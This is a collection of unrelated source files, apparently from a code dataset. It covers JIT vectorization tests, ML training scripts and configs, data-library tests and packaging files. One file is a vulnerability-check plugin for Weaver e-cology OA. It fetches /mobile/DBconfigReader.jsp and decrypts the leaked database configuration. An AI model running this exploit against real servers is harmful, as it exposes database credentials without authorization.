myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
T = lltype.Array(rffi.DOUBLE, hints={'nolength': True})
def f(d):
va = lltype.malloc(T, d, flavor='raw', zero=True)
i = 0
while i < d:
myjitdriver.jit_merge_point()
va[i] = va[i] + 34.5
i += 1
val = va[0]
lltype.free(va, flavor='raw')
return val
res = self.meta_interp(f, [60], vec=True)
assert res == f(60) == 34.5
def test_constant_expand_vec_all(self):
myjitdriver = JitDriver(greens = [], reds = 'auto')
T = lltype.Array(rffi.DOUBLE, hints={'nolength': True})
def f(d):
va = lltype.malloc(T, d, flavor='raw', zero=True)
i = 0
while i < d:
myjitdriver.jit_merge_point()
if not (i < d):
raise IndexError
va[i] = va[i] + 34.5
i += 1
val = va[0]
lltype.free(va, flavor='raw')
return val
res = self.meta_interp(f, [60], vec=True, vec_all=True)
assert res == f(60) == 34.5
@py.test.mark.parametrize('type,value', [(rffi.DOUBLE, 58.4547),
(lltype.Signed, 2300000), (rffi.INT, 4321),
(rffi.SHORT, 9922), (rffi.SIGNEDCHAR, -127)])
def test_variable_expand(self, type, value):
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
T = lltype.Array(type, hints={'nolength': True})
def f(d,variable):
va = lltype.malloc(T, d, flavor='raw', zero=True)
i = 0
while i < d:
myjitdriver.jit_merge_point()
va[i] = rffi.cast(type, variable)
i += 1
val = va[d//2]
lltype.free(va, flavor='raw')
return val
res = self.meta_interp(f, [60,value], vec=True)
assert res == f(60,value) == value
@py.test.mark.parametrize('vec,vec_all',[(False,True),(True,False),(True,True),(False,False)])
def test_accum(self, vec, vec_all):
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=vec)
T = lltype.Array(rffi.DOUBLE)
def f(d, value):
va = lltype.malloc(T, d, flavor='raw', zero=True)
for i in range(d):
va[i] = value
r = 0
i = 0
k = d + 2
# in this case a guard k <= d is inserted which fails right away!
while i < d:
myjitdriver.jit_merge_point()
if not(i < k):
k -= 1
r += va[i]
i += 1
lltype.free(va, flavor='raw')
return r
res = self.meta_interp(f, [60,0.5], vec=vec, vec_all=vec_all)
assert res == f(60,0.5) == 60*0.5
@py.test.mark.parametrize('i',[15])
def test_array_bounds_check_elimination(self,i):
myjitdriver = JitDriver(greens = [],
reds = 'auto',
vectorize=True)
T = lltype.Array(rffi.INT, hints={'nolength': True})
def f(d):
va = lltype.malloc(T, d, flavor='raw', zero=True)
vb = lltype.malloc(T, d, flavor='raw', zero=True)
for j in range(d):
va[j] = rffi.r_int(j)
vb[j] = rffi.r_int(j)
i = 0
while i < d:
myjitdriver.jit_merge_point()
if i < 0:
raise IndexError
if i >= d:
raise IndexError
a = va[i]
if i < 0:
raise IndexError
if i >= d:
raise IndexError
b = vb[i]
ec = intmask(a)+intmask(b)
if i < 0:
raise IndexError
if i >= d:
raise IndexError
va[i] = rffi.r_int(ec)
i += 1
lltype.free(va, flavor='raw')
lltype.free(vb, flavor='raw')
return 0
res = self.meta_interp(f, [i], vec=True)
assert res == f(i)
@py.test.mark.parametrize('size',[12])
def test_body_multiple_accesses(self, size):
myjitdriver = JitDriver(greens = [], reds = 'auto')
T = lltype.Array(rffi.CHAR, hints={'nolength': True})
def f(size):
vector_a = malloc(T, size)
vector_b = malloc(T, size)
i = 0
while i < size:
myjitdriver.jit_merge_point()
# should unroll and group them correctly
c1 = vector_a[i]
c2 = vector_a[i+1]
c3 = vector_a[i+2]
#
vector_b[i] = c1
vector_b[i+1] = c2
vector_b[i+2] = c3
i += 3
free(vector_a)
free(vector_b)
return 0
res = self.meta_interp(f, [size], vec=True, vec_all=True)
assert res == f(size)
def test_max_byte(self):
myjitdriver = JitDriver(greens = [], reds = 'auto')
T = lltype.Array(rffi.SIGNEDCHAR, hints={'nolength': True})
def f(size):
vector_a = malloc(T, size)
for i in range(size):
vector_a[i] = rffi.r_signedchar(1)
for i in range(size/2,size):
vector_a[i] = rffi.r_signedchar(i)
i = 0
max = -127
while i < size:
myjitdriver.jit_merge_point()
a = intmask(vector_a[i])
a = a & 255
if a > max:
max = a
i += 1
free(vector_a)
return max
res = self.meta_interp(f, [128], vec=True, vec_all=True)
assert res == f(128)
def combinations(types, operators):
import itertools
size = 22
class Typ(object):
def __init__(self, type, storecast, loadcast):
self.type = type
self.storecast = storecast
self.loadcast = loadcast
def __repr__(self):
return self.type.replace(".","_")
sizes = [22]
for t1, t2, t3, op, size in itertools.product(types, types, types, operators, sizes):
yield (size, Typ(*t1), Typ(*t2), Typ(*t3), op[0], op[1])
types = [('rffi.DOUBLE', 'float', 'float'),
('rffi.SIGNED', 'int', 'int'),
#('rffi.FLOAT', 'rffi.r_singlefloat', 'float'),
]
operators = [('add', '+'),
]
for size, typ1, typ2, typ3, opname, op in combinations(types, operators):
_source = """
def test_binary_operations_{name}(self):
myjitdriver = JitDriver(greens = [], reds = 'auto')
T1 = lltype.Array({type_a}, hints={{'nolength': True}})
T2 = lltype.Array({type_b}, hints={{'nolength': True}})
T3 = lltype.Array({type_c}, hints={{'nolength': True}})
def f(size):
vector_a = lltype.malloc(T1, size, flavor='raw')
vector_b = lltype.malloc(T2, size, flavor='raw')
vector_c = lltype.malloc(T3, size, flavor='raw')
for i in range(size):
vector_a[i] = {type_a_storecast}(1)
for i in range(size):
vector_b[i] = {type_b_storecast}(1)
for i in range(size):
vector_c[i] = {type_c_storecast}(1)
i = 0
while i < size:
myjitdriver.jit_merge_point()
a = {type_a_loadcast}(vector_a[i])
b = {type_b_loadcast}(vector_b[i])
c = (a {op} b)
vector_c[i] = {type_c_storecast}(c)
i += 1
lltype.free(vector_a, flavor='raw')
lltype.free(vector_b, flavor='raw')
c = {type_c_loadcast}(0.0)
for i in range(size):
c += {type_c_loadcast}(vector_c[i])
lltype.free(vector_c, flavor='raw')
return c
res = self.meta_interp(f, [{size}], vec=True, vec_all=True)
assert res == f({size})
"""
env = {
'type_a': typ1.type,
'type_b': typ2.type,
'type_c': typ3.type,
'type_a_loadcast': typ1.loadcast,
'type_b_loadcast': typ2.loadcast,
'type_c_loadcast': typ3.loadcast,
'type_a_storecast': typ1.storecast,
'type_b_storecast': typ2.storecast,
'type_c_storecast': typ3.storecast,
'size': size,
'name': str(typ1) + '__' + str(typ2) + '__' + str(typ3) + \
'__' + str(size) + '__' + opname,
'op': op,
}
formatted = _source.format(**env)
exec py.code.Source(formatted).compile()
def test_binary_operations_aa(self):
myjitdriver = JitDriver(greens = [], reds = 'auto')
T1 = lltype.Array(rffi.DOUBLE, hints={'nolength': True})
T3 = lltype.Array(rffi.SIGNED, hints={'nolength': True})
def f(size):
vector_a = lltype.malloc(T1, size, flavor='raw', zero=True)
vector_b = lltype.malloc(T1, size, flavor='raw', zero=True)
vector_c = lltype.malloc(T3, size, flavor='raw', zero=True)
i = 0
while i < size:
myjitdriver.jit_merge_point()
a = (vector_a[i])
b = (vector_b[i])
c = (a + b)
vector_c[i] = int(c)
i += 1
free(vector_a)
free(vector_b)
#c = 0.0
#for i in range(size):
# c += vector_c[i]
lltype.free(vector_c, flavor='raw')
return 0
res = self.meta_interp(f, [22], vec=True, vec_all=True)
assert res == f(22)
def test_guard_test_location_assert(self):
myjitdriver = JitDriver(greens = [], reds = 'auto')
T1 = lltype.Array(rffi.SIGNED, hints={'nolength': True})
def f(size):
vector_a = lltype.malloc(T1, size, flavor='raw', zero=True)
for i in range(size):
vector_a[i] = 0
i = 0
breaks = 0
while i < size:
myjitdriver.jit_merge_point()
a = vector_a[i]
if a:
breaks = 1
break
del a
i += 1
lltype.free(vector_a, flavor='raw')
return breaks
res = self.meta_interp(f, [22], vec=True, vec_all=True)
assert res == f(22)
def run_unpack(self, unpack, vector_type, assignments, float=True):
vars = {'v':0,'f':0,'i':0}
def newvar(type):
c = vars[type]
vars[type] = c + 1
if type == 'v':
return type + str(c) + vector_type
return type + str(c)
targettoken = TargetToken()
finaldescr = BasicFinalDescr(1)
args = []
args_values = []
pack = []
suffix = 'f' if float else 'i'
for var, vals in assignments.items():
v = newvar('v')
pack.append('%s = vec_%s()' % (v, suffix))
for i,val in enumerate(vals):
args_values.append(val)
f = newvar(suffix)
args.append(f)
count = 1
# create a new variable
vo = v
v = newvar('v')
pack.append('%s = vec_pack_%s(%s, %s, %d, %d)' % \
(v, suffix, vo, f, i, count))
vars['x'] = v
packs = '\n '.join(pack)
resvar = suffix + '{'+suffix+'}'
        # format the resoperations; take care that the lhs of '='
        # is formatted later with a new variable name
unpackops = unpack
if isinstance(unpack, str):
unpackops = [unpack]
unpacksf = []
for up in unpackops:
lhs, rhs = up.split("=")
rhsf = rhs.format(**vars)
newvar('i'); newvar('f'); newvar('v')
lhsf = lhs.format(**vars)
unpacksf.append(lhsf + '=' + rhsf)
unpacks = '\n '.join(unpacksf)
source = '''
[{args}]
label({args}, descr=targettoken)
{packs}
{unpacks}
finish({resvar}, descr=finaldescr)
'''.format(args=','.join(args),packs=packs, unpacks=unpacks,
resvar=resvar.format(**vars))
print(source)
return self._compile_and_run(source, args_values, float,
ns={'targettoken': targettoken, 'finaldescr': finaldescr})
def _compile_and_run(self, source, args_values, float=True, ns={}):
loop = parse(source, namespace=ns)
cpu = self.CPUClass(rtyper=None, stats=None)
cpu.setup_once()
#
looptoken = JitCellToken()
cpu.compile_loop(loop.inputargs, loop.operations, looptoken)
#import pdb; pdb.set_trace()
deadframe = cpu.execute_token(looptoken, *args_values)
print(source)
if float:
return cpu.get_float_value(deadframe, 0)
else:
return cpu.get_int_value(deadframe, 0)
def test_unpack_f(self):
# double unpack
assert self.run_unpack("f{f} = vec_unpack_f({x}, 0, 1)",
"[2xf64]", {'x': (1.2,-1.0)}) == 1.2
assert self.run_unpack("f{f} = vec_unpack_f({x}, 1, 1)",
"[2xf64]", {'x': (50.33,4321.0)}) == 4321.0
def test_unpack_i64(self):
# int64
assert self.run_unpack("i{i} = vec_unpack_i({x}, 1, 1)",
"[2xi64]", {'x': (14,15)}, float=False) == 15
assert self.run_unpack("i{i} = vec_unpack_i({x}, 0, 1)",
"[2xi64]", {'x': (11,12)}, float=False) == 11
def test_unpack_i(self):
for i in range(16):
# i8
op = "i{i} = vec_unpack_i({x}, %d, 1)" % i
assert self.run_unpack(op, "[16xi8]", {'x': [127,1]*8}, float=False) == \
(127 if i%2==0 else 1)
# i16
if i < 8:
assert self.run_unpack(op, "[8xi16]", {'x': [2**15-1,0]*4}, float=False) == \
(2**15-1 if i%2==0 else 0)
# i32
if i < 4:
assert self.run_unpack(op, "[4xi32]", {'x': [2**31-1,0]*4}, float=False) == \
(2**31-1 if i%2==0 else 0)
def test_unpack_several(self):
values = [1,2,3,4]
for i,v in enumerate(values):
j = (i // 2) * 2
op = ["v{v}[2xi32] = vec_unpack_i({x}, %d, 2)" % j,
"i{i} = vec_unpack_i(v{v}[2xi32], %d, 1)" % (i % 2)]
assert self.run_unpack(op, "[4xi32]", {'x': values}, float=False) == v
values = [1,2,3,4,5,6,7,8]
for i,v in enumerate(values):
j = (i // 4) * 4
op = ["v{v}[4xi16] = vec_unpack_i({x}, %d, 4)" % j,
"i{i} = vec_unpack_i(v{v}[4xi16], %d, 1)" % (i % 4)]
assert self.run_unpack(op, "[8xi16]", {'x': values}, float=False) == v
values = [1,2,3,4,5,6,7,8] * 2
for i,v in enumerate(values):
j = (i // 8) * 8
op = ["v{v}[8xi8] = vec_unpack_i({x}, %d, 8)" % j,
"i{i} = vec_unpack_i(v{v}[8xi8], %d, 1)" % (i % 8)]
assert self.run_unpack(op, "[16xi8]", {'x': values}, float=False) == v
def test_int32_float_casts(self):
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
def f(bytecount, va, vb, vc):
i = 0
j = 0
while i < bytecount:
myjitdriver.jit_merge_point()
a = raw_storage_getitem(rffi.INT,va,j)
b = raw_storage_getitem(rffi.DOUBLE,vb,i)
c = rffi.cast(rffi.DOUBLE,a)+b
raw_storage_setitem(vc, i, c)
j += 4
i += 8
count = 32
va = alloc_raw_storage(4*count, zero=True)
vb = alloc_raw_storage(8*count, zero=True)
for i,v in enumerate([1,2,3,4]*(count/4)):
raw_storage_setitem(va, i*4, rffi.cast(rffi.INT,v))
for i,v in enumerate([-1.0,-2.0,-3.0,-4.0]*(count/4)):
raw_storage_setitem(vb, i*8, rffi.cast(rffi.DOUBLE,v))
vc = alloc_raw_storage(8*count, zero=True)
self.meta_interp(f, [8*count, va, vb, vc], vec=True)
for i in range(count):
assert raw_storage_getitem(rffi.DOUBLE,vc,i*8) == 0.0
free_raw_storage(va)
free_raw_storage(vb)
free_raw_storage(vc)
def test_float_int32_casts(self):
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
def f(bytecount, va, vb, vc):
i = 0
j = 0
while j < bytecount:
myjitdriver.jit_merge_point()
a = raw_storage_getitem(rffi.DOUBLE,va,j)
b = raw_storage_getitem(rffi.INT,vb,i)
c = a+rffi.cast(rffi.DOUBLE,b)
raw_storage_setitem(vc, j, c)
i += 4
j += 8
count = 32
va = alloc_raw_storage(8*count, zero=True)
vb = alloc_raw_storage(4*count, zero=True)
for i,v in enumerate([1.0,2.0,3.0,4.0]*(count/4)):
raw_storage_setitem(va, i*8, rffi.cast(rffi.DOUBLE,v))
for i,v in enumerate([-1,-2,-3,-4]*(count/4)):
raw_storage_setitem(vb, i*4, rffi.cast(rffi.INT,v))
vc = alloc_raw_storage(8*count, zero=True)
self.meta_interp(f, [8*count, va, vb, vc], vec=True)
for i in range(count):
assert raw_storage_getitem(rffi.DOUBLE,vc,i*8) == 0.0
free_raw_storage(va)
free_raw_storage(vb)
free_raw_storage(vc)
class TestLLtype(LLJitMixin, VectorizeTests):
# skip some tests on this backend
def test_unpack_f(self):
pass
def test_unpack_i64(self):
pass
def test_unpack_i(self):
pass
def test_unpack_several(self):
pass
def test_vec_int_sum(self):
pass
|
pysad/statistics/median_meter.py | selimfirat/pysad | 155 | 11155593 | from heapq import heappush
from pysad.core.base_statistic import UnivariateStatistic
class MedianMeter(UnivariateStatistic):
"""The statistic that keeps track of the median.
Attrs:
num_items (int): The number of items that are used to update the statistic.
lst (list[float]): The list of values that are used to update the statistic. It is necessary for windowing operations.
"""
def __init__(self):
self.lst = []
self.num_items = 0
def update(self, num):
"""Updates the statistic with the value for a timestep.
Args:
num (float): The incoming value, for which the statistic is used.
Returns:
object: self.
"""
heappush(self.lst, num)
self.num_items += 1
return self
def remove(self, num):
"""Updates the statistic by removing particular value. This method
Args:
num (float): The value to be removed.
Returns:
object: self.
"""
self.lst.remove(num)
self.num_items -= 1
return self
def get(self):
""" Method to obtain the tracked statistic.
Returns:
float: The statistic.
"""
self.lst = sorted(self.lst)
if self.num_items % 2 == 0:
return (self.lst[self.num_items // 2] + self.lst[self.num_items // 2 - 1]) / 2
else:
return self.lst[self.num_items // 2]
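# Illustrative usage sketch (not part of the original module); it relies only on the
# update/remove/get methods defined above, and the sample values are made up.
if __name__ == "__main__":
    meter = MedianMeter()
    for x in [5.0, 1.0, 3.0]:
        meter.update(x)
    print(meter.get())  # 3.0, the median of 1, 3, 5
    meter.remove(5.0)
    print(meter.get())  # 2.0, the mean of the two remaining values 1 and 3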
|
.modules/.metagoofil/hachoir_core/cmd_line.py | termux-one/EasY_HaCk | 1,103 | 11155621 |
from optparse import OptionGroup
from hachoir_core.log import log
from hachoir_core.i18n import _, getTerminalCharset
from hachoir_core.tools import makePrintable
import hachoir_core.config as config
def getHachoirOptions(parser):
"""
Create an option group (type optparse.OptionGroup) of Hachoir
library options.
"""
def setLogFilename(*args):
log.setFilename(args[2])
common = OptionGroup(parser, _("Hachoir library"), \
"Configure Hachoir library")
common.add_option("--verbose", help=_("Verbose mode"),
default=False, action="store_true")
common.add_option("--log", help=_("Write log in a file"),
type="string", action="callback", callback=setLogFilename)
common.add_option("--quiet", help=_("Quiet mode (don't display warning)"),
default=False, action="store_true")
common.add_option("--debug", help=_("Debug mode"),
default=False, action="store_true")
return common
def configureHachoir(option):
# Configure Hachoir using "option" (value from optparse)
if option.quiet:
config.quiet = True
if option.verbose:
config.verbose = True
if option.debug:
config.debug = True
def unicodeFilename(filename, charset=None):
if not charset:
charset = getTerminalCharset()
try:
return unicode(filename, charset)
except UnicodeDecodeError:
return makePrintable(filename, charset, to_unicode=True)
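# Illustrative wiring sketch (not from the original module): it shows how the helpers
# above are typically combined with optparse; the usage string is an assumption.
def _example_parser():
    from optparse import OptionParser
    parser = OptionParser(usage="%prog [options] filename")
    parser.add_option_group(getHachoirOptions(parser))
    return parser
# e.g.: values, arguments = _example_parser().parse_args(); configureHachoir(values)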
|
jokekappa/__init__.py | CodeTengu/jokekappa | 107 | 11155632 | # coding: utf-8
from jokekappa.core import get_joke, get_jokes, update_jokes # noqa: F401
__version__ = '0.1.9'
|
demo/cilrs/cilrs_train.py | L-Net-1992/DI-drive | 219 | 11155661 | from collections import defaultdict
import os
import numpy as np
from ding.utils.data.collate_fn import default_collate, default_decollate
from easydict import EasyDict
from tqdm import tqdm
import torch
from torch.utils.data import DataLoader
from tensorboardX import SummaryWriter
from torch.optim import Adam
from core.policy import CILRSPolicy
from core.data import CILRSDataset
config = dict(
exp_name='cilrs_train',
policy=dict(
cuda=True,
cudnn=True,
resume=False,
ckpt_path=None,
model=dict(
num_branch=4,
),
learn=dict(
epoches=200,
batch_size=128,
loss='l1',
lr=1e-4,
speed_weight=0.05,
control_weights=[0.5, 0.45, 0.05],
),
eval=dict(
eval_freq=10,
)
),
data=dict(
train=dict(
root_dir='./datasets_train/cilrs_datasets_train',
preloads='./_preloads/cilrs_datasets_train.npy',
transform=True,
),
val=dict(
root_dir='./datasets_train/cilrs_datasets_val',
preloads='./_preloads/cilrs_datasets_val.npy',
transform=True,
),
)
)
main_config = EasyDict(config)
def train(policy, optimizer, loader, tb_logger=None, start_iter=0):
loss_epoch = defaultdict(list)
iter_num = start_iter
policy.reset()
for data in tqdm(loader):
log_vars = policy.forward(data)
optimizer.zero_grad()
total_loss = log_vars['total_loss']
total_loss.backward()
optimizer.step()
log_vars['cur_lr'] = optimizer.defaults['lr']
for k, v in log_vars.items():
loss_epoch[k] += [log_vars[k].item()]
if iter_num % 50 == 0 and tb_logger is not None:
tb_logger.add_scalar("train_iter/" + k, v, iter_num)
iter_num += 1
loss_epoch = {k: np.mean(v) for k, v in loss_epoch.items()}
return iter_num, loss_epoch
def validate(policy, loader, tb_logger=None, epoch=0):
loss_epoch = defaultdict(list)
policy.reset()
for data in tqdm(loader):
with torch.no_grad():
log_vars = policy.forward(data)
for k in list(log_vars.keys()):
loss_epoch[k] += [log_vars[k]]
loss_epoch = {k: np.mean(v) for k, v in loss_epoch.items()}
if tb_logger is not None:
for k, v in loss_epoch.items():
tb_logger.add_scalar("validate_epoch/" + k, v, epoch)
return loss_epoch
def save_ckpt(state, name=None, exp_name=''):
os.makedirs('checkpoints/' + exp_name, exist_ok=True)
ckpt_path = 'checkpoints/{}/{}_ckpt.pth'.format(exp_name, name)
torch.save(state, ckpt_path)
def load_best_ckpt(policy, optimizer=None, root_dir='checkpoints', exp_name='', ckpt_path=None):
ckpt_dir = os.path.join(root_dir, exp_name)
assert os.path.isdir(ckpt_dir), ckpt_dir
files = os.listdir(ckpt_dir)
assert files, 'No ckpt files found'
if ckpt_path and ckpt_path in files:
pass
elif os.path.exists(os.path.join(ckpt_dir, 'best_ckpt.pth')):
ckpt_path = 'best_ckpt.pth'
else:
ckpt_path = sorted(files)[-1]
print('Load ckpt:', ckpt_path)
state_dict = torch.load(os.path.join(ckpt_dir, ckpt_path))
policy.load_state_dict(state_dict)
if 'optimizer' in state_dict:
optimizer.load_state_dict(state_dict['optimizer'])
epoch = state_dict['epoch']
iterations = state_dict['iterations']
best_loss = state_dict['best_loss']
return epoch, iterations, best_loss
def main(cfg):
if cfg.policy.cudnn:
torch.backends.cudnn.benchmark = True
train_dataset = CILRSDataset(**cfg.data.train)
val_dataset = CILRSDataset(**cfg.data.val)
train_loader = DataLoader(train_dataset, cfg.policy.learn.batch_size, shuffle=True, num_workers=8)
val_loader = DataLoader(val_dataset, cfg.policy.learn.batch_size, num_workers=8)
cilrs_policy = CILRSPolicy(cfg.policy)
optimizer = Adam(cilrs_policy._model.parameters(), cfg.policy.learn.lr)
tb_logger = SummaryWriter('./log/{}/'.format(cfg.exp_name))
iterations = 0
best_loss = 1e8
start_epoch = 0
if cfg.policy.resume:
start_epoch, iterations, best_loss = load_best_ckpt(
cilrs_policy.learn_mode, optimizer, exp_name=cfg.exp_name, ckpt_path=cfg.policy.ckpt_path
)
for epoch in range(start_epoch, cfg.policy.learn.epoches):
iter_num, loss = train(cilrs_policy.learn_mode, optimizer, train_loader, tb_logger, iterations)
iterations = iter_num
tqdm.write(
f"Epoch {epoch:03d}, Iter {iter_num:06d}: Total: {loss['total_loss']:2.5f}" +
f" Speed: {loss['speed_loss']:2.5f} Str: {loss['steer_loss']:2.5f}" +
f" Thr: {loss['throttle_loss']:2.5f} Brk: {loss['brake_loss']:2.5f}"
)
if epoch % cfg.policy.eval.eval_freq == 0:
loss_dict = validate(cilrs_policy.learn_mode, val_loader, tb_logger, iterations)
total_loss = loss_dict['total_loss']
tqdm.write(f"Validate Total: {total_loss:2.5f}")
state_dict = cilrs_policy.learn_mode.state_dict()
state_dict['optimizer'] = optimizer.state_dict()
state_dict['epoch'] = epoch
state_dict['iterations'] = iterations
state_dict['best_loss'] = best_loss
if total_loss < best_loss and epoch > 0:
tqdm.write("Best Validation Loss!")
best_loss = total_loss
state_dict['best_loss'] = best_loss
save_ckpt(state_dict, 'best', cfg.exp_name)
save_ckpt(state_dict, '{:05d}'.format(epoch), cfg.exp_name)
if __name__ == '__main__':
main(main_config)
|
configs/detection/_base_/datasets/nway_kshot/base_voc.py | BIGWangYuDong/mmfewshot | 376 | 11155667 |
# dataset settings
img_norm_cfg = dict(
mean=[103.530, 116.280, 123.675], std=[1.0, 1.0, 1.0], to_rgb=False)
train_multi_pipelines = dict(
query=[
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1000, 600), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])
],
support=[
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Normalize', **img_norm_cfg),
dict(type='GenerateMask', target_size=(224, 224)),
dict(type='RandomFlip', flip_ratio=0.0),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])
])
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1000, 600),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img'])
])
]
# classes splits are predefined in FewShotVOCDataset
data_root = 'data/VOCdevkit/'
data = dict(
samples_per_gpu=4,
workers_per_gpu=2,
train=dict(
type='NWayKShotDataset',
num_support_ways=15,
num_support_shots=1,
one_support_shot_per_image=True,
num_used_support_shots=200,
save_dataset=False,
dataset=dict(
type='FewShotVOCDataset',
ann_cfg=[
dict(
type='ann_file',
ann_file=data_root +
'VOC2007/ImageSets/Main/trainval.txt'),
dict(
type='ann_file',
ann_file=data_root + 'VOC2012/ImageSets/Main/trainval.txt')
],
img_prefix=data_root,
multi_pipelines=train_multi_pipelines,
classes=None,
use_difficult=True,
instance_wise=False,
dataset_name='query_dataset'),
support_dataset=dict(
type='FewShotVOCDataset',
ann_cfg=[
dict(
type='ann_file',
ann_file=data_root +
'VOC2007/ImageSets/Main/trainval.txt'),
dict(
type='ann_file',
ann_file=data_root + 'VOC2012/ImageSets/Main/trainval.txt')
],
img_prefix=data_root,
multi_pipelines=train_multi_pipelines,
classes=None,
use_difficult=False,
instance_wise=False,
dataset_name='support_dataset')),
val=dict(
type='FewShotVOCDataset',
ann_cfg=[
dict(
type='ann_file',
ann_file=data_root + 'VOC2007/ImageSets/Main/test.txt')
],
img_prefix=data_root,
pipeline=test_pipeline,
classes=None),
test=dict(
type='FewShotVOCDataset',
ann_cfg=[
dict(
type='ann_file',
ann_file=data_root + 'VOC2007/ImageSets/Main/test.txt')
],
img_prefix=data_root,
pipeline=test_pipeline,
test_mode=True,
classes=None),
model_init=dict(
copy_from_train_dataset=True,
samples_per_gpu=16,
workers_per_gpu=1,
type='FewShotVOCDataset',
ann_cfg=None,
img_prefix=data_root,
pipeline=train_multi_pipelines['support'],
use_difficult=False,
instance_wise=True,
classes=None,
dataset_name='model_init_dataset'))
evaluation = dict(interval=5000, metric='mAP')
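# Sketch of how this base config is usually consumed (assumed path, mmcv/mmdet-style
# `_base_` inheritance); any field such as data.train.num_support_shots can then be
# overridden in the child config:
# _base_ = ['../_base_/datasets/nway_kshot/base_voc.py']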
|
buildroot-2021.05.3/support/testing/tests/package/test_python_gpiozero.py | thvlt/tinyemu | 349 | 11155702 | from tests.package.test_python import TestPythonPackageBase
class TestPythonGpiozero(TestPythonPackageBase):
config = TestPythonPackageBase.config
sample_scripts = ["tests/package/sample_python_gpiozero.py"]
def run_sample_scripts(self):
cmd = self.interpreter + " sample_python_gpiozero.py"
output, exit_code = self.emulator.run(cmd)
self.assertEqual(exit_code, 0)
cmd = "pinout -r a020d3 -m | cat"
self.assertRunOk(cmd)
class TestPythonPy3Gpiozero(TestPythonGpiozero):
__test__ = True
config = TestPythonGpiozero.config + \
"""
BR2_PACKAGE_PYTHON3=y
BR2_PACKAGE_PYTHON_GPIOZERO=y
"""
|
tests/test_0088-read-with-http.py | eic/uproot4 | 133 | 11155713 |
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot4/blob/main/LICENSE
from __future__ import absolute_import
import pytest
import uproot
@pytest.mark.network
def test_issue176():
with uproot.open(
"https://starterkit.web.cern.ch/starterkit/data/advanced-python-2019/dalitzdata.root"
) as f:
data = f["tree/Y1"].array(library="np")
assert len(data) == 100000
@pytest.mark.network
def test_issue176_again():
with uproot.open(
"https://starterkit.web.cern.ch/starterkit/data/advanced-python-2019/dalitzdata.root"
) as f:
data = f["tree"].arrays(["Y1", "Y2"], library="np")
assert len(data["Y1"]) == 100000
assert len(data["Y2"]) == 100000
@pytest.mark.network
def test_issue121():
with uproot.open(
"https://github.com/CoffeaTeam/coffea/raw/master/tests/samples/nano_dy.root"
) as f:
data = f["Events/MET_pt"].array(library="np")
assert len(data) == 40
|
setup.py | mforbes/anaconda-project | 188 | 11155716 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2017, Anaconda, Inc. All rights reserved.
#
# Licensed under the terms of the BSD 3-Clause License.
# (See LICENSE.txt for details)
# -----------------------------------------------------------------------------
import setuptools
import versioneer
import io
setuptools.setup(
name='anaconda-project',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
keywords=["conda anaconda project reproducible data science"],
url='http://github.com/Anaconda-Server/anaconda-project',
license='BSD 3-Clause',
author="Anaconda, Inc",
author_email='<EMAIL>',
maintainer='Anaconda, Inc',
maintainer_email='<EMAIL>',
description='Tool for encapsulating, running, and reproducing data science projects',
long_description=io.open("README.md", 'r', encoding='utf-8').read(),
zip_safe=False,
install_requires=['anaconda-client', 'conda-pack', 'requests', 'ruamel_yaml', 'tornado>=4.2', 'jinja2'],
entry_points={'console_scripts': [
'anaconda-project = anaconda_project.cli:main',
]},
packages=setuptools.find_packages(exclude=['contrib', 'docs', 'tests*']),
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable', 'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent', 'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6'
])
|
demo/demo_fa.py | Alias-Alan/pypsy | 169 | 11155746 | # coding=utf-8
# Exploratory factor analysis
from __future__ import print_function, division, unicode_literals
import numpy as np
from psy import Factor, data
score = data['lsat.dat']
factor = Factor(score, 5)
print(factor.loadings)
|
python/app/plugins/http/Weaver Ecology OA/Weaver_Ecology_Oa_Config.py | taomujian/linbing | 351 | 11155757 | #!/usr/bin/python3
import json
import pyDes
import urllib3
from app.lib.utils.request import request
from app.lib.utils.common import get_useragent
class Weaver_Ecology_Oa_Config_BaseVerify:
def __init__(self, url):
self.info = {
            'name': 'Weaver OA Config information disclosure vulnerability',
            'description': 'Weaver OA Config information disclosure vulnerability; affected scope: Weaver e-cology OA system V8 and V9',
'date': '2019-10-24',
'exptype': 'check',
'type': 'Infomation'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.headers = {
"User-Agent": get_useragent(),
}
def check(self):
"""
        Check whether the vulnerability exists
        :param:
        :return bool True or False: whether the vulnerability exists
"""
try:
url = self.url + "/mobile/DBconfigReader.jsp"
check_req = request.get(url, headers = self.headers)
if check_req.status_code == 200:
cipherX = pyDes.des(' ')
cipherX.setKey('<KEY>')
result = cipherX.decrypt(check_req.content.strip()).strip().decode('utf-8')
print("存在泛微config信息泄露漏洞")
return True, result
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == '__main__':
Weaver_Ecology_OA_Config = Weaver_Ecology_Oa_Config_BaseVerify('http://127.0.0.1')
Weaver_Ecology_OA_Config.check() |
tests/test_api_events.py | tonykhbo/ansible-runner-service | 174 | 11155759 |
import sys
import json
import logging
import unittest
sys.path.extend(["../", "./"])
from common import APITestCase # noqa
# turn of normal logging that the ansible_runner_service will generate
nh = logging.NullHandler()
r = logging.getLogger()
r.addHandler(nh)
class TestJobEvents(APITestCase):
